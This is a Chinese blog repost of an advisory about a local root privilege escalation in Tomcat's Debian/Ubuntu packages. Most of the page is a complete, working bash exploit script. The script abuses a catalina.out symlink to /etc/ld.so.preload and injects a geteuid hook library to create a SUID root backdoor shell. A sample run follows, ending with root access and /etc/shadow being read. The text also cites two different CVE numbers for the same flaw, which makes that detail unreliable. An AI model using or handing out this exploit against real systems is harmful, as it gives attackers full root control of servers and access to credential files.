Finger
一只孤独的代码狗/程序猿/攻城狮

就在各位欢度国庆的时候,Tomcat于10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不大,受影响的用户需要特别关注。

Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。

2000px-Tomcat-logo.svg.png

漏洞编号:

CVE-2016-4438

影响范围:

Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

受影响的系统包括Debian、Ubuntu,其他使用相应deb包的系统也可能受到影响。

修复方案:

Debian安全团队已经修复了受影响的包;更新至系统提供的最新版Tomcat包即可。

漏洞概述:

Debian系统的Linux上管理员通常利用apt-get进行包管理,CVE-2016-4438这一漏洞其问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本:/etc/init.d/tocat* 利用该脚本,可导致攻击者通过低权限的Tomcat用户获得系统root权限!

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。

漏洞PoC:

#!/bin/bash # # Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit # # CVE-2016-1240 # # Discovered and coded by: # # Dawid Golunski # http://legalhackers.com # # This exploit targets Tomcat (versions 6, 7 and 8) packaging on  # Debian-based distros including Debian, Ubuntu etc. # It allows attackers with a tomcat shell (e.g. obtained remotely through a  # vulnerable java webapp, or locally via weak permissions on webapps in the  # Tomcat webroot directories etc.) to escalate their privileges to root. # # Usage: # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] # # The exploit can used in two ways: # # -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly # gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.  # It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up # a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) # # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to  # /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.  # Attackers can come back at a later time and check on the /etc/default/locale file. Upon a  # Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can # then add arbitrary commands to the file which will be executed with root privileges by  # the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default  # Ubuntu/Debian Tomcat installations). # # See full advisory for details at: # http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/tomcatrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit {
    # Cleanup      echo -e "\n[+] Cleaning up..."     rm -f $PRIVESCSRC     rm -f $PRIVESCLIB     rm -f $TOMCATLOG     touch $TOMCATLOG     if [ -f /etc/ld.so.preload ]; then         echo -n > /etc/ld.so.preload 2>/dev/null
    fi     echo -e "\n[+] Job done. Exiting with code $1 \n"     exit $1 } function ctrl_c() {
        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."     cleanexit 0
} #intro  echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then     echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"     exit 3 fi if [ "$2" = "-deferred" ]; then     mode="deferred" else     mode="active" fi # Priv check echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" id | grep -q tomcat if [ $? -ne 0 ]; then     echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"     exit 3 fi # Set target paths TOMCATLOG="$1" if [ ! -f $TOMCATLOG ]; then     echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"     exit 3 fi echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG" # [ Deferred exploitation ] # Symlink the log file to /etc/default/locale file which gets executed daily on default # tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. # Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been # restarted and file owner gets changed. if [ "$mode" = "deferred" ]; then     rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG     if [ $? -ne 0 ]; then         echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."         cleanexit 3
    fi     echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"     echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"     echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"     echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"     echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)  \n\n"     exit 0 fi # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> uid_t geteuid(void) {
    static uid_t  (*old_geteuid)();
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl if [ $? -ne 0 ]; then     echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."     cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then     echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."     cleanexit 2 fi # Symlink the log file to ld.so.preload rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG if [ $? -ne 0 ]; then     echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."     cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" # Wait for Tomcat to re-open the logs echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)  " while :; do     sleep 0.1
    if [ -f /etc/ld.so.preload ]; then         echo $PRIVESCLIB > /etc/ld.so.preload
        break;
    fi done # /etc/ld.so.preload file should be owned by tomcat user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo --help 2>/dev/null >/dev/null # Check for the rootshell ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then     echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"     echo -e "\n\033[94mPlease tell me you're seeing this too ;)  \033[0m" else     echo -e "\n[!] Failed to get root"     cleanexit 2 fi # Execute the rootshell echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" $BACKDOORPATH -p # Job done. cleanexit 0

Poc运行示例:

tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04 LTS
Release: 16.04 Codename:	xenial

tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii  libtomcat7-java              7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- core libraries
ii  tomcat7                      7.0.68-1ubuntu0.1               all          Servlet and JSP engine
ii  tomcat7-common               7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- common files

tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out 
 
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240 Discovered and coded by: 

Dawid Golunski 

http://legalhackers.com

[+] Starting the exploit in [active] mode with the following privileges: 
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh

[+] Symlink created at: 
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: 
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh

Please tell me you're seeing this too ;)  [+] Executing the rootshell /tmp/tomcatrootsh now! 

tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit 

详情:http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

转载自:http://www.freebuf.com/vuls/115862.html 

这篇文章还没有人发言,快抢第一!

发表评论